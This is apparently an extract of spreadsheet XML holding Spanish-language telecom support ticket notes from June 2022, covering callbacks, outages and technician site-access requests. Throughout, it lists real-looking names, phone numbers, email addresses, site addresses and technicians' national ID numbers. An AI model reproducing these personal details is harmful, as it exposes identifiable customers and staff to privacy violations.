    <t>F4611947</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE HONEY LAZO  8206 2447 NO RESPONDE || ENVIA A BUZON **
-ID 1001579339
**</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE ARIEL BENAVIDES. 22980225 INDICA QUE NO RESPONDE QUE ESTA DOWN YA QUE ESTA HACIENDO PING AL GATEWAY Y BRINDA LA IP 192.168.107.1 || SE NOTIFICA A GESTOR **
- ID 1001580256
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AYELKA GALEANO  5842 3475 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001579676
**</t>
  </si>
  <si>
    <t>F4611952</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALMA YADIRA LAINEZ  98571169 PARA SOLICITAR DATOS DE VISITA
-ID 1001577585
NOMBRE DEL CLIENTE: REGISTRO NACIONAL DE LAS PERSONAS
UBICACIÓN:VALLECILLOS FRANCISCO MORAZAN, SI VAN DE TEGUCIGALPA EL DESVIO SE LLAMA LA CAÑAGA, MUNICIPIO DE VALLECILLOS
CONTACTO EN SITIO: ALMA YADIRA LAINEZ - 98571169
HORARIO DE ATENCION:HASTA LAS 16:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALMA YADIRA LAINEZ 98571169 PARA BRINDAR RETROALIMENTACION
-ID 1001599383</t>
  </si>
  <si>
    <t>F4611955</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SKARLET MANZANERO AL 41753808 ENVIA DIRECTO A BUZON || NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001657761
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SKARLET MANZANERO AL 41753808 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001595350
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SKARLET MANZANERO AL 41753808 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001607657
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SKARLET MANZANERO AL 41753808 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001576977 -  1001577202
**</t>
  </si>
  <si>
    <t>-* HABLA CON SKARLET MANZANERO  41753805  (CLIENTE) INFORMA QUE REALIZARON PRUEBAS Y PERSISTE LA LENTITUD, SOLICITA SE LE COMPARTAN PRUEBAS Y DE SER POSIBLE LAS GRAFICAS AL CORREO SMANZANERO@MP.GOB.GT PARA QUE PUEDAN ESCALARLO CON SU CENTRAL -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SKARLET MANZANERO 41753808 ENVIA DIRECTO A BUZON
-ID 1001615851</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE SKARLET MANZANERO 41753808 ,MENCIONA QUE NO HAY MUCHA SEÑAL MOVIL PERO YA NO ESTA TRABAJANDO POR LO QUE SOLICITA SE DE SEGUIMIENTO MAÑANA EN HORARIO HABIL
-ID 1001735897</t>
  </si>
  <si>
    <t>-* SKARLET MANZANERO  41753805 (CLIENTE) INFORMA QUE ACTUALMENTE SE ENCUENTRA EN SU TIEMPO DE ALMUERZO, AL VOLVER ENVIARA LAS PRUEBAS A SU CENTRAL Y ESTARÁ VALIDANDO VIA CORREO -*
-*</t>
  </si>
  <si>
    <t>F4611956</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO GONZALEZ AL 58504084 INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO **
-ID 1001659901
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO GONZALEZ AL 58504084 INDICA QUE SIGUE VIENDO LENTITUD EN EL SERVICIO || SE NOTIFICA A GESTOR  **
-ID 1001595676
**</t>
  </si>
  <si>
    <t>F4611960</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SKARLET MANZANERO AL 41753808 ENVIA DIRECTO A BUZON || NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001640501
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SKARLET MANZANEROS 41753805 MENCIONA QUE EL SERVICIO YA ESA FUNCIONANDO
-ID 1001735897</t>
  </si>
  <si>
    <t>F4611982</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE ESCRIBE Y SE LE RESPONDE QUE CNOC RESPONDERÁ*/*//
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 12:01
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G102 - CAIDO ENLACE DE DATOS CLARO - CON ID 770600101T
BUENOS DÍAS WALTER,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
----------------------------
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 11:35
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G102 - CAIDO ENLACE DE DATOS CLARO - CON ID 770600101T
BUEN DÍA, TE COMENTO JAIME QUE EL COMPORTAMIENTO SE HA VISTO SIMILAR NO SE SI SERÁ REQUERIDO REINICIAR LOS EQUIPOS O APLICAR ALGO MAS.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001733806</t>
  </si>
  <si>
    <t>F4611986</t>
  </si>
  <si>
    <t>## SE LLAMAA  A TECNICO MARLON.  COEMNTA QUE ESTA A LA ESPERA DE CLIENTE ## SE IBRNDA CODIGO DE CIERRE##
2001022204
COLA:
NOMBRE: A: 58263218
NÚMERO: 58263218
DURACIÓN: 0:02:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58263218
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 09:24:22</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE RANDALL HERNANDEZ 49722291  ## NO CONTESTA##
1001579755
COLA:
NOMBRE: A: 49722291
NÚMERO: 55280199
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 09:29:00
1001579919
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 09:29:10</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INGRID GARCIA-24454395  ## SOLICITA QUE SE CERTIFIQUE EN CONJUNTO CON SU PROVEEDO EL DIA   VIERNES 24/06/22 A LAS 09:00  ##
SANATORIO ANTITUBERCULOSIS SAN VICENTE.-
DIRECCION: 11 AVENIDA A 12-30  ZONA 7 COLONIA LA VERBENA
1001580384
COLA:
NOMBRE: A: 24454395
NÚMERO: 24454395
DURACIÓN: 0:01:28
ESTADO: CONECTADA
DETALLES: 24454395
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 09:30:07</t>
  </si>
  <si>
    <t>RANDALL HERNANDEZ / INGRID GARCIA-24454395 ###   QUEDA ENTERADO + INDICA QUE DARA SEGUIMIETNO CON EJECUTIVO##
2001045527
COLA:
NOMBRE: A: 24454395
NÚMERO: 24454395
DURACIÓN: 0:03:17
ESTADO: CONECTADA
DETALLES: 24454395
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 10:28:50</t>
  </si>
  <si>
    <t>F4612026</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR., ALEJANDRO HERNANDEZ ESTA REALIZANDO CONSULTAS SOBRE EL ENLACE...</t>
  </si>
  <si>
    <t>F4612028</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO TEJADA 42271739 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 1001585479</t>
  </si>
  <si>
    <t>F4612030</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO FUENTES 42181770 MENCIONA QUE TIENEN PROBLEAM DE ENERGIA EN PR
-ID 1001614535 - 1001614828</t>
  </si>
  <si>
    <t>SE LLAMA  ALCIENTE ROBERTO FUENTES 42181770 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001604151</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO FUENTES AL 42181770  SOLICITA QUE SE LE LLAME EN 10 MIN PARA CONFIRMAR
 SI HAY ENERGIA EN SITIO**
-ID 1001599083
**</t>
  </si>
  <si>
    <t>F4612041</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIBEL FAJARDO QUIEN INDICA QUE NO ESTA EN EL PUNTO REMOTO Y SOLICITA QUE SE LLAME A  ANA LUCIA DE LA CRUZ 56327189.
1001679069
COLA:
NOMBRE: A: 56331647
NÚMERO: 56331647
DURACIÓN: 0:00:23
ESTADO: CONECTADA
DETALLES: 56331647
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 14:04:55</t>
  </si>
  <si>
    <t>CLIENTE PIDE SE COORDINE VISITA TÉCNICA HASTA EL DÍA LUNES 27 A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ANA LUCIA  DE LA CRUZ, QUIEN SOLICITA VISITA TECNICA HASTA EL DIA LUNES 27/06 A PARTIR DE LAS 8:00AM
SE APERTURA WO PARA ASGINACION DE PERSONAL YA QUE HAY QUE ENVIAR CORREO.
1001679405
COLA:
NOMBRE: A: 56327189
NÚMERO: 56327189
DURACIÓN: 0:00:45
ESTADO: CONECTADA
DETALLES: 56327189
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 14:06:43</t>
  </si>
  <si>
    <t>F4612042</t>
  </si>
  <si>
    <t>INFORMA TEC HÉCTOR GODÍNEZ TEL: 7037-8504 QUE CLIENTE SE RETIRÓ A LAS 17:00 HORAS, TRABAJARÁ PROACTIVAMENTE, INDICA QUE SE ENCUENTRA REALIZANDO MEDICIONES EN LA RED DE COBRE, SOLICITA LLAMADA EN 30 MINUTOS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA DE PRUEBA AL GDN 22413300 Y EFECTIVAMENTE APROXIMADAMENTE AL MINUTO LA LLAMADA SE CORTA. SE OBSERVA A NIVEL DE IP QUE SE PIERDE LA COMUNICACIÓN HACIA LA PBX. ID DE LLAMADA: 1001588228</t>
  </si>
  <si>
    <t>CLIENTE CHRISTIAN ALEMAN 76826275  VALIDA QUE YA NO HA PRESENTADO INCONVENIENTES CON LLAMADAS QUE SE CORTAN. SE LE INFORMA QUE AYER POR LA TARDE SE REALIZÓ LA REPARACIÓN EN LA RED DE COBRE. CLIENTE AUTORIZA EL CIERRE DEL CASO.  ID:1001786415</t>
  </si>
  <si>
    <t>F4612044</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SARA L. IRIAS 22804000 OPCIÓN 1 A SE TRATA DE BRINDAR RETROALIMENTACION PERO CORTAN LA LLAMDA
-ID 1001644375</t>
  </si>
  <si>
    <t>F4612045</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001732807</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 10:43
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;
CC: MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; JUAN JOSE VELIZ CERON &lt;JUAN.VELIZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; EMERSON RENATTO ROBLES TORRES &lt;EMERSON.ROBLES@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 1849 / CAIDA TOTAL Y REVISION DE EQUIPOS
BUEN DÍA
   SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
AXEL DANILO ZARPEC SAZO
IBM: 796395
DPI: 1624525270501
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, FAVOR DE COORDINAR VISITA PARA HOY MIÉRCOLES A LAS 15:00 HORAS Y AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4612066</t>
  </si>
  <si>
    <t>BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4612066 |844200002T | SERVICIOS Y TERMINALES, S.A.  |PUERTO SAN JOSE ESCUINTLA, COORDENADAS 13.967297 Y -90.791691 ESCUINTLA SAN JOSE
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA DE ACUERDO A SU OPERACIÓN PARA PODER REALIZAR COORDINACIÓN
TÉCNICOS:
NOMBRE: MILTON DAVID MORATAYA GONZALEZ
 IBM: 650123
 DPI: 2277084580501
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUNIOR ALFARO AL 47213068 CONTESTA EL SEÑOR MARLON INDICA QUE PERSISTE LA LENTITUD Y POR RATOS SE DESCONECTA TOTALMENTE || SE NOTIFICA A GESTOR **
-ID 1001600848
**</t>
  </si>
  <si>
    <t>F4612084</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KIMBERLY VELIZ 40131523 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001861839</t>
  </si>
  <si>
    <t>F4612090</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOSA AL 2420 7200 EXT. 2413 NO RESPONDE SE INTENTARA LUEGO **
-ID 1001628519 - 1001628882
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOSA AL 24207200 EXT. 2413 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001638351
**</t>
  </si>
  <si>
    <t>F4612094</t>
  </si>
  <si>
    <t>RE: F4612094 || 7800719T ||CC_GYT_GT_INTERNET_AGENCIA_219
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:AG209 CC PRADERA GERENTE &lt;AG209JEFE@GTC.COM.GT&gt;;BRENDA MARISOL DE PAZ PEREZ
CC:DENIS SICA &lt;DSICA@GTC.COM.GT&gt;;LESTER LEONEL RODAS MARROQUINY 4 MÁS
MAR 28/06/2022 12:55
BUENA TARDE  ESTIMADO CLIENTE,
ES UN GUSTO SALUDARLE, LE COMENTO QUE NUESTRA AREA TECNICA TRABAJA 24/7 , POR TAL MOTIVO , EL HORARIO ESTAMOS ABIERTOS ,AL QUE SE ADECUE MEJOR A SU OPERAION, YA SEA ANTES DE APERTURA  O DESPUES DE CIERRE PARA EVITAR AFECTAR SU OPERACION, ,
QUEDO ATENTO A SUS COMENTARIOS
DE: AG209 CC PRADERA GERENTE &lt;AG209JEFE@GTC.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 10:21
PARA: BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;
CC: DENIS SICA &lt;DSICA@GTC.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ASI CC TELECOMUNICACIONES &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;
ASUNTO: RE: F4612094 || 7800719T ||CC_GYT_GT_INTERNET_AGENCIA_219
BUEN DIA ESTIMADOS:
ME PODRÍAN INDICAR SI ESTO SE HARÁ EN HORARIO DE ATENCIÓN AL PÚBLICO O UN HORARIO ANTES DE LA APERTURA, YA QUE TENGO QUE SOLICITAR AUTORIZACIÓN CON EL CENTRO COMERCIAL PARA EL INGRESO DEL PERSONAL.
ADEMÁS ME PODRÍAN INDICAR SI ESTO AFECTARA NUESTRO SERVICIO YA QUE NUESTRA AGENCIA POR SER FIN DE MES Y TEMAS DE ASUETOS TENDRÁ DEMASIADA AFLUENCIA ESTOS DIAS.
CUALQUIER DUDA A LA ORDEN.
RAUL AGUILAR
AG209 CC PRADERA GERENTE
GERENCIA DE CANALES DE COMERCIALIZACIÓN
AG209JEFE@GTC.COM.GT
20 CALLE</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 23386801 EXT. | 32320 | 32388 RESPONDE ANDREA  QUIEN BRINDA EL NUMERO DE LA AGENCIA
-ID 3001895202</t>
  </si>
  <si>
    <t>MENCIONA QUE ES NECESARIO QUE PERSONAL DE INFORMATICA ESTE ENTERADO PERO NO TIENE NINGUN CORREO PARA PODER ENVIAR LOS DATOS DE PERSONAL TECNICO Y COORDINAR LA VISITA TECNICA PERO BRINDA CONTACTO DE LA CENTRAL 23386801</t>
  </si>
  <si>
    <t>####SE INTENTA LLAMAR PARA INDICAR COMO PODEMOS PROPORCIONARLE DATOS DE TECNICOS PERO NO SE TIENE RESPUESTA INTENTAR NUEVAMENTE EN UNOS INSTANTES##
RESULTADO: CONTESTADA
NOMBRE: 56252686
NÚMERO: 56252686
INICIO: HOY, 13:46
FIN: HOY, 13:49
DURACIÓN: 2:42
ID DE LLAMADA: 3001934719</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
ASUNTO: GESTION DE PERMISOS | CC_GYT_GT_INTERNET_AGENCIA_219</t>
  </si>
  <si>
    <t>###CON A POYO DE PROACTIVO Y RETROALIMENTACION SE LOGRA VERIFICAR UN CORREO DEL CLIENTE PARA PODER ENVIARLE LOS DATOS ###
IPINFRAESTRUCTURA@GTC.COM.GT
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 5 DE JULIO DE 2022 15:25
PARA: IPINFRAESTRUCTURA@GTC.COM.GT &lt;IPINFRAESTRUCTURA@GTC.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS | CC_GYT_GT_INTERNET_AGENCIA_219
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIA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t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23386801 EXT. | 32320 | 32388 PERO NO RESPONDEN SE INTENTARA LUEGO
-ID 3001880635 - 3001881158</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON DATOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 11:51
PARA: AG219ADM1@GTC.COM.GT &lt;AG219ADM1@GTC.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS || "CC_GYT_GT_INTERNET_AGENCIA_219" || F4612094
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIA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22861812 MENCIONA QUE NO HA RECIBIDO NINGUN CORREO
-ID 3001897982</t>
  </si>
  <si>
    <t>SE HABLÓ CON EL GERENTE DE LA AGENCIA RAUL AGUILAR QUIEN COMENTA QUE NO TIENEN PROBLEMAS CON EL INTERNET, SE LE SOLICITA APOYO PARA REVISAR EQUIPO DE ULTIMA MILLA YA QUE AYER SE PRESENTÓ UNA ALARMA PERO EL ROUTER NO SE HABIA REINICIADO. COMENTA QUE EN ESTE MOMENTO TIENE QUE ATENDER A UN CLIENTE Y SOLICITA QUE SE LE LLAME A LAS 3PM PARA PODER REVISAR LOS EQUIPOS. TICKET SE DEJA EN PC Y SE DEJA PROGRAMADA LA LLAMADA.
1001598880
COLA:
NOMBRE: A: 22861553
NÚMERO: 22861553
DURACIÓN: 0:09:27
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22861553
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 22/06/2022 10:28:13</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDE ANDREA QUIEN TRANSFIERE AL AREA CORRESPONDIENTE PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001851370 -  1001851807</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA PARA VALIDAR QUE EQUIPOS DE RED CUENTEN CON UPS APOYA GERENTE DE AGENCIA RAUL, SE VERIFICAN CONEXIONES SIN EMBARGO INDICA QUE TODO ESTA ENREDADO, NO VISUALIZA SI EQUIPO ASMI TIENE PROTECCION POR UPS POR LO MISMO, INDICA QUE EQUIPO QUE SE CONECTA EL ASMI ESTA DETEREORADO SE VERIFICO QUE AL REALIZAR VALIDACION DE CONEXIONES SE DESCONECTO DE MANERA MOMENTANEA, POR LO QUE SE RECOMIENDA QUE PERSONAL TECNICO DE CLARO REVISE INTEGRIDAD DE LOS EQUIPOS.
1001738817
COLA:
NOMBRE: A: 50189890
NÚMERO: 50189890
DURACIÓN: 0:19:52
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50189890
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 22/06/2022 17:26:59</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RESPONDE DAVID MENCIONA QUE NO TIENE EL NUMERO DE PERSONAL DE INFORMATICA PERO BRINDA EL CORREO DE MARLON PERALTA - MPERALTA@GTC.COM.GT PARA GESTIONAR LOS PERMISOS
-ID 1001882939</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23386801 EXT. | 32320 | 32388   PERO NO SE TIENE RESPUESTA DE NINGUNA EXTENSION
-ID 2001552095 -  2001552331</t>
  </si>
  <si>
    <t>F4612097</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ AL 53344315 INDICA QUE SE LE LLAME EN 10 MIN NUEVAMENTE QUE NO ESTA EN SITIO**
-ID 1001629937
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PEREZ 53344315 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE CONFIRMA QUE AYER PRESENTARON PROBLEMA DE ENERGIA
-ID 1001635812</t>
  </si>
  <si>
    <t>F4612099</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS NAVARRO AL 51552078 INDICA QUE NO ES CON EL QUE SE LE LLAME AL SEÑOR ADAN
AL NUMERO 41987027 **
-ID 1001631414
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADAN AL NUMERO 41987027 INDICA QUE ESTA DEMASIADO LENTO || SE NOTIFICA A GESTOR **
-ID 1001632614 - 1001632919
**</t>
  </si>
  <si>
    <t>F4612102</t>
  </si>
  <si>
    <t>SE HA ENVIADO RFO A CLIENTE ##</t>
  </si>
  <si>
    <t>SETIENE A CLIENTE EN LINEA "## SAUL MENDEZ-78559800  -COMENTA QUE SE DE SEGUIMIENTO CON CARLOS AYALA  79390774##
1001611482
COLA:
NOMBRE: A: 0050378559800
NÚMERO: 0050378559800
DURACIÓN: 0:03:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378559800
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 22/06/2022 10:55:45</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL MENDEZ-78559800 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001841084</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 11:02
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: SOLICITUD DE RFO || MINISTERIO DE GOBERNACION Y DESARROLLO TERRITORIAL || F4612102
BUEN DÍA
    SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
MINISTERIO DE GOBERNACION Y DESARROLLO TERRITORIAL
26657100SV
F4612102
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA SE PUEDA COMPARTIR EL RFO
SAULALONSO@HOTMAIL.COM - SMENDEZ@PROTECCIONCIVIL.GOB.SV</t>
  </si>
  <si>
    <t>SAUL MENDEZ-78559800  SE TIENE EN LINEA ##
1001810059
COLA:
NOMBRE: A: 0050378559800
NÚMERO: 0050378559800
DURACIÓN: 0:00:34
ESTADO: CONECTADA
DETALLES: 0050378559800
